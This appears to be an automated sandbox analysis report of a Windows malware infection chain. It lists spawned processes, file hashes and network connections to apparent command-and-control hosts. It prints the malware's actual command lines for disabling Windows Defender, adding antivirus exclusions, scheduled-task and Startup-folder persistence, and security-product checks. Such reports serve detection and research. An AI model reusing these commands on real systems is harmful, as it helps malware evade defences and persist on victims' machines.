| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe
"C:\Users\Admin\AppData\Local\Temp\4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456.exe"
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\07DD4GXsP3.exe
"C:\Users\Admin\AppData\Roaming\07DD4GXsP3.exe"
C:\Users\Admin\AppData\Roaming\egKXRnvmfw.exe
"C:\Users\Admin\AppData\Roaming\egKXRnvmfw.exe"
C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe
"C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe"
C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
"C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\1000238002\Amadeus.exe
"C:\Users\Admin\1000238002\Amadeus.exe"
C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe
"C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe"
C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
"C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
"C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\1000260001\5KNCHALAH.exe
"C:\Users\Admin\AppData\Local\Temp\1000260001\5KNCHALAH.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe
"C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe"
C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe
"C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
C:\Users\Admin\AppData\Local\Temp\service123.exe
"C:\Users\Admin\AppData\Local\Temp\service123.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe
"C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe"
C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe
"C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\NPqcpcuVNB.exe
"C:\Users\Admin\AppData\Roaming\NPqcpcuVNB.exe"
C:\Users\Admin\AppData\Roaming\tFtzeaz0BT.exe
"C:\Users\Admin\AppData\Roaming\tFtzeaz0BT.exe"
C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe
"C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe"
C:\Users\Admin\AppData\Local\Temp\1000265001\broadcom5.exe
"C:\Users\Admin\AppData\Local\Temp\1000265001\broadcom5.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe" "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F
C:\Windows\system32\schtasks.exe
schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe
"C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Users\Admin\AppData\Local\Temp\filename.exe
"C:\Users\Admin\AppData\Local\Temp\filename.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Investigations Investigations.bat & Investigations.bat & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 684126
C:\Windows\SysWOW64\findstr.exe
findstr /V "VegetablesIndividualBindingGba" Ever
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C
C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif
Intake.pif C
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 590819
C:\Windows\SysWOW64\findstr.exe
findstr /V "MEDICAIDGROUPSSHARPGOVERNOR" Novels
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Sheet + ..\Drums + ..\Actually + ..\Mls + ..\Real + ..\Zoophilia + ..\Ah + ..\Opposed + ..\Affiliated y
C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif
Associates.pif y
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
"C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe"
C:\Users\Admin\AppData\Local\Temp\7zSA469.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe
.\Install.exe /PdidSen "385107" /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
"C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2836 -ip 2836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 492
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe
"C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bDxiLwhXhHymEtvbIE" /SC once /ST 14:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe\" Jk /djdidPGu 385107 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\1000300001\runtime.exe
"C:\Users\Admin\AppData\Local\Temp\1000300001\runtime.exe"
C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif
C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\Pictures\Lighter Tech\runtime.exe
"C:\Users\Admin\Pictures\Lighter Tech\runtime.exe"
C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5176 -ip 5176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5176 -ip 5176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 1160
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\1000300001\runtime.exe" "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| RU | 185.215.113.117:80 | 185.215.113.117 | tcp |
| US | 8.8.8.8:53 | 117.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| DE | 95.179.250.45:26212 | tcp | |
| RU | 185.215.113.26:80 | 185.215.113.26 | tcp |
| US | 8.8.8.8:53 | 45.250.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.113.215.185.in-addr.arpa | udp |
| FI | 65.21.18.51:45580 | tcp | |
| US | 8.8.8.8:53 | 51.18.21.65.in-addr.arpa | udp |
| RU | 185.215.113.26:80 | 185.215.113.26 | tcp |
| RU | 185.215.113.17:80 | 185.215.113.17 | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | 17.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.107.216.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| RU | 185.215.113.17:80 | 185.215.113.17 | tcp |
| US | 8.8.8.8:53 | fivev5sb.top | udp |
| RU | 195.133.48.136:80 | fivev5sb.top | tcp |
| US | 8.8.8.8:53 | 136.48.133.195.in-addr.arpa | udp |
| RU | 185.215.113.19:80 | 185.215.113.19 | tcp |
| US | 8.8.8.8:53 | 19.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| RU | 185.215.113.67:15206 | tcp | |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| FI | 95.216.143.20:12695 | tcp | |
| US | 8.8.8.8:53 | 67.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.143.216.95.in-addr.arpa | udp |
| RU | 185.215.113.19:80 | 185.215.113.19 | tcp |
| RU | 185.215.113.19:80 | 185.215.113.19 | tcp |
| US | 8.8.8.8:53 | millyscroqwp.shop | udp |
| US | 104.21.84.66:443 | millyscroqwp.shop | tcp |
| US | 8.8.8.8:53 | 66.84.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | locatedblsoqp.shop | udp |
| US | 8.8.8.8:53 | traineiwnqo.shop | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | condedqpwqm.shop | udp |
| US | 104.21.10.172:443 | condedqpwqm.shop | tcp |
| TM | 91.202.233.158:80 | 91.202.233.158 | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 172.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.233.202.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| RU | 185.215.113.26:80 | 185.215.113.26 | tcp |
| FI | 65.21.18.51:45580 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | softonic-pc.ru | udp |
| RU | 37.140.192.11:443 | softonic-pc.ru | tcp |
| US | 8.8.8.8:53 | 11.192.140.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 104.21.84.66:443 | millyscroqwp.shop | tcp |
| US | 8.8.8.8:53 | 240902175059845.std.kqve01.top | udp |
| US | 8.8.8.8:53 | locatedblsoqp.shop | udp |
| US | 8.8.8.8:53 | traineiwnqo.shop | udp |
| US | 104.21.10.172:443 | condedqpwqm.shop | tcp |
| CH | 179.43.188.227:80 | 240902175059845.std.kqve01.top | tcp |
| NL | 45.200.149.147:80 | 45.200.149.147 | tcp |
| US | 8.8.8.8:53 | 227.188.43.179.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.149.200.45.in-addr.arpa | udp |
| RU | 194.58.114.223:80 | 194.58.114.223 | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | 223.114.58.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN | udp |
| US | 8.8.8.8:53 | DGLQIQwMnon.DGLQIQwMnon | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 103.130.147.211:80 | 103.130.147.211 | tcp |
| US | 8.8.8.8:53 | 211.147.130.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| RU | 185.215.113.19:80 | 185.215.113.19 | tcp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thirtv13pt.top | udp |
| RU | 195.133.13.230:80 | thirtv13pt.top | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.13.133.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| RU | 185.215.113.19:80 | 185.215.113.19 | tcp |
| US | 8.8.8.8:53 | femininedspzmhu.shop | udp |
| US | 104.21.66.172:443 | femininedspzmhu.shop | tcp |
| US | 8.8.8.8:53 | locatedblsoqp.shop | udp |
| US | 8.8.8.8:53 | traineiwnqo.shop | udp |
| US | 104.21.10.172:443 | condedqpwqm.shop | tcp |
| US | 8.8.8.8:53 | 172.66.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| NL | 45.200.149.147:27667 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
Files
memory/2820-0-0x0000000000020000-0x00000000004C6000-memory.dmp
memory/2820-1-0x0000000077744000-0x0000000077746000-memory.dmp
memory/2820-2-0x0000000000021000-0x000000000004F000-memory.dmp
memory/2820-3-0x0000000000020000-0x00000000004C6000-memory.dmp
memory/2820-4-0x0000000000020000-0x00000000004C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
| MD5 | 59953a2ace8d80a3eac87bb37cf35871 |
| SHA1 | f22821242ad268998f04a52f46ce23bf1d0bddd3 |
| SHA256 | 4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456 |
| SHA512 | 87e266458db8c1c39d4f4473b7933c30f60964f2246727c48f44b4bcfa83e3207bc660f887148316c0a09681b9795276fe25acea94b5324e1760d5a1472969f8 |
memory/2820-17-0x0000000000020000-0x00000000004C6000-memory.dmp
memory/452-18-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/452-19-0x0000000000791000-0x00000000007BF000-memory.dmp
memory/452-20-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/452-21-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/452-22-0x0000000000790000-0x0000000000C36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
| MD5 | 2d647cf43622ed10b6d733bb5f048fc3 |
| SHA1 | 6b9c5f77a9ef064a23e5018178f982570cbc64c6 |
| SHA256 | 41426dd54fcabbf30a68b2aa11aa4f61f3862bea83109d3e3c50cfebed1359e6 |
| SHA512 | 62400f1e9646268f0326aab5b95efacb0303f4c5879cccf0cbb24d1f66d0db40d0fdfebb09ba785b5dfd54df2d32e8aab48c1f5f333956b606112de68635ac3a |
memory/4460-43-0x000000007335E000-0x000000007335F000-memory.dmp
memory/4460-44-0x0000000000140000-0x0000000000194000-memory.dmp
memory/2428-46-0x0000000000400000-0x0000000000452000-memory.dmp
memory/2428-48-0x0000000005070000-0x0000000005614000-memory.dmp
memory/2428-49-0x0000000004AC0000-0x0000000004B52000-memory.dmp
memory/2428-50-0x0000000004C50000-0x0000000004C5A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tmp8B96.tmp
| MD5 | 1420d30f964eac2c85b2ccfe968eebce |
| SHA1 | bdf9a6876578a3e38079c4f8cf5d6c79687ad750 |
| SHA256 | f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9 |
| SHA512 | 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8 |
memory/2428-67-0x0000000005720000-0x0000000005796000-memory.dmp
memory/2428-68-0x0000000005EB0000-0x0000000005ECE000-memory.dmp
memory/2428-71-0x0000000006840000-0x0000000006E58000-memory.dmp
memory/2428-72-0x0000000006330000-0x000000000643A000-memory.dmp
memory/2428-73-0x0000000006270000-0x0000000006282000-memory.dmp
memory/2428-74-0x00000000062D0000-0x000000000630C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
| MD5 | 8e74497aff3b9d2ddb7e7f819dfc69ba |
| SHA1 | 1d18154c206083ead2d30995ce2847cbeb6cdbc1 |
| SHA256 | d8e81d9e336ef37a37cae212e72b6f4ef915db4b0f2a8df73eb584bd25f21e66 |
| SHA512 | 9aacc5c130290a72f1087daa9e79984565ccab6dbcad5114bfed0919812b9ba5f8dee9c37d230eeca4df3cca47ba0b355fbf49353e53f10f0ebc266e93f49f97 |
memory/2428-90-0x0000000006440000-0x000000000648C000-memory.dmp
memory/3944-94-0x00000000009B0000-0x0000000000AC2000-memory.dmp
memory/2100-96-0x0000000000400000-0x000000000050D000-memory.dmp
memory/2100-100-0x0000000000400000-0x000000000050D000-memory.dmp
memory/2100-99-0x0000000000400000-0x000000000050D000-memory.dmp
memory/2100-97-0x0000000000400000-0x000000000050D000-memory.dmp
C:\Users\Admin\AppData\Roaming\07DD4GXsP3.exe
| MD5 | 88367533c12315805c059e688e7cdfe9 |
| SHA1 | 64a107adcbac381c10bd9c5271c2087b7aa369ec |
| SHA256 | c6fc5c06ad442526a787989bae6ce0d32a2b15a12a41f78baca336b6560997a9 |
| SHA512 | 7a8c3d767d19395ce9ffef964b0347a148e517982afcf2fc5e45b4c524fd44ec20857f6be722f57ff57722b952ef7b88f6249339551949b9e89cf60260f0a714 |
C:\Users\Admin\AppData\Roaming\egKXRnvmfw.exe
| MD5 | 30f46f4476cdc27691c7fdad1c255037 |
| SHA1 | b53415af5d01f8500881c06867a49a5825172e36 |
